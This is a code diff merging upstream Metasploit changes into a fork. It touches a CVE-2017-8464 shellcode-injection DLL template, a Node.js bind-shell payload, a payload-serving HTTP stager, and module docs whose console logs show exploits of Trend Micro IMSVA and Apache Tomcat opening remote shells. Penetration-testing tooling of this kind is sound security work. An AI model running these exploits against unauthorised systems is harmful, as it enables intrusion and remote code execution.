Merge pull request #6 from rapid7/master

updating master

Author: itsmeroy2012

Gemfile.lock

@@ -237,7 +237,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.14)
+    rex-exploitation (0.1.15)
       jsobfu
       metasm
       rex-arch

LICENSE_GEMS

@@ -84,7 +84,7 @@ rex-arch, 0.1.9, "New BSD"
 rex-bin_tools, 0.1.4, "New BSD"
 rex-core, 0.1.11, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.14, "New BSD"
+rex-exploitation, 0.1.15, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"

data/exploits/cve-2017-8464/src/build.sh

@@ -6,11 +6,10 @@ CCx64="x86_64-w64-mingw32"
 
 ${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
 ${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
-${CCx64}-strip -s temp.dll -o template_x64_windows.dll
+${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll
 rm -f temp.dll *.o
 
 ${CCx86}-gcc -c -Os template.c -Wall -shared
 ${CCx86}-dllwrap --def template.def *.o -o temp.dll
-${CCx86}-strip -s temp.dll -o template_x86_windows.dll
+${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll
 rm -f temp.dll *.o
-

data/exploits/cve-2017-8464/src/template.c

@@ -22,13 +22,13 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
 		ExecutePayload();
 		break;
 
-        case DLL_PROCESS_DETACH:
+		case DLL_PROCESS_DETACH:
 		break;
 
-        case DLL_THREAD_ATTACH:
+		case DLL_THREAD_ATTACH:
 		break;
 
-        case DLL_THREAD_DETACH:
+		case DLL_THREAD_DETACH:
 		break;
 	}
 
@@ -69,7 +69,7 @@ void ExecutePayload(void)
 	inline_bzero(&si, sizeof(si));
 	si.cb = sizeof(si);
 
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+	// Create a suspended process, write shellcode into stack, resume it
 	if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
 		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
 		GetThreadContext(pi.hThread, &ctx);

documentation/modules/auxiliary/scanner/http/http_version.md

@@ -0,0 +1,40 @@
+## Description
+
+This module displays the version information about each system.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/http_version```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+**Running the scanner**
+
+```
+msf > use auxiliary/scanner/http/http_version 
+msf auxiliary(http_version) > show options
+
+Module options (auxiliary/scanner/http/http_version):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                yes       The number of concurrent threads
+   VHOST                     no        HTTP server virtual host
+
+msf auxiliary(http_version) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf auxiliary(http_version) > run
+
+[+] 192.168.56.101:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+msf auxiliary(http_version) > 
+```

documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md

@@ -0,0 +1,61 @@
+## Vulnerable Application
+This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
+
+The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
+
+**Vulnerable Application Installation Steps**
+
+IMSVA is distrubed as an ISO image by Trend Micro.
+
+Following steps are valid on the CentOS 6 x64 bit operating system.
+
+1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
+2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
+3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
+4. Click to the download button and complete installation of ISO.
+
+If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
+
+[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
+
+**System requirements:**
+- Virtualbox or VMware can be used. 
+- 4 GB of memory at least.
+- 120 GB of disk size at least.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
+- [ ] **Verify** that you are getting `Session with widget framework successfully initiated` session.
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/trendmicro_imsva_widget_exec
+msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
+RHOST => 12.0.0.184
+msf exploit(trendmicro_imsva_widget_exec) > check
+[*] 12.0.0.184:443 The target appears to be vulnerable.
+msf exploit(trendmicro_imsva_widget_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Extracting JSESSIONID from publicly accessible log file
+[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
+[*] Initiating session with widget framework
+[+] Session with widget framework successfully initiated.
+[*] Trigerring command injection vulnerability
+[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300
+
+pwd
+/opt/trend/imss/UI/adminUI/ROOT/widget
+
+```

documentation/modules/exploit/multi/http/tomcat_jsp_upload_bypass.md

@@ -0,0 +1,53 @@
+## Description
+
+This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.
+
+## Vulnerable Application
+	
+When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
+
+To set up a vulnerable installation:
+1. Download and install an affected version of Apache Tomcat.
+2. Download and install Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
+3. In conf directory of Apache Tomcat, edit the web.xml file and set the "readonly" parameter to false for the default servlet.
+4. Restart the Tomcat service.
+
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/http/tomcat_jsp_upload_bypass```
+1. Do: ```set payload java/jsp_shell_bind_tcp```
+2. Do: ```set RHOST [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```check```
+5. It should be reported as vulnerable
+6. Do: ```run```
+7. You should get a shell
+
+## Scenarios
+
+```
+msf > use exploit/multi/http/tomcat_jsp_upload_bypass 
+msf exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_bind_tcp 
+payload => java/jsp_shell_bind_tcp
+msf exploit(tomcat_jsp_upload_bypass) > set RHOST 10.10.40.93
+RHOST => 10.10.40.93
+msf exploit(tomcat_jsp_upload_bypass) > set RPORT 8080
+RPORT => 8080
+msf exploit(tomcat_jsp_upload_bypass) > check
+[+] 10.10.40.93:8080 The target is vulnerable.
+msf exploit(tomcat_jsp_upload_bypass) > run
+
+[*] Started bind handler
+[*] Uploading payload...
+[*] Payload executed!
+[*] Command shell session 1 opened (10.10.230.230:39979 -> 10.10.40.93:4444) at 2017-10-11 07:43:08 -0400
+
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\apache-tomcat-7.0.81>whoami
+whoami
+nt authority\system
+
+```

lib/msf/core/exploit/cmdstager/http.rb

@@ -27,9 +27,25 @@ def start_service(opts = {})
   end
 
   def on_request_uri(cli, request)
-    if request['User-Agent'] =~ /^(?:Wget|curl)/
+    client = cli.peerhost
+
+    if (user_agent = request.headers['User-Agent'])
+      client << " (#{user_agent})"
+    end
+
+    print_status("Client #{client} requested #{request.raw_uri}")
+
+    if stager_instance.respond_to?(:user_agent)
+      agent_regex = stager_instance.user_agent
+    else
+      agent_regex = /.*/
+    end
+
+    if user_agent =~ agent_regex
+      print_status("Sending payload to #{client}")
       send_response(cli, exe)
     else
+      print_status("Sending 404 to #{client}")
       send_not_found(cli)
     end
   end

lib/msf/core/payload/nodejs.rb

@@ -19,11 +19,11 @@ def nodejs_bind_tcp
           var sh = cp.spawn(cmd, []);
           socket.pipe(sh.stdin);
           if (typeof util.pump === "undefined") {
-            sh.stdout.pipe(client.socket);
-            sh.stderr.pipe(client.socket);          
+            sh.stdout.pipe(socket);
+            sh.stderr.pipe(socket);
           } else {
-            util.pump(sh.stdout, client.socket);
-            util.pump(sh.stderr, client.socket);
+            util.pump(sh.stdout, socket);
+            util.pump(sh.stderr, socket);
           }
         });
         server.listen(#{datastore['LPORT']});

lib/msf/core/post/linux/system.rb

@@ -86,12 +86,18 @@ def get_sysinfo
       version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
       system_data[:distro] = "gentoo"
       system_data[:version] = version
-    else
 
-      # Others
+    # Generic
+    elsif etc_files.include?("issue")
       version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
       system_data[:distro] = "linux"
       system_data[:version] = version
+
+    # Others, could be a mismatch like ssh_login to cisco device
+    else
+      system_data[:distro] = "linux"
+      system_data[:version] = ''
+
     end
     return system_data
   end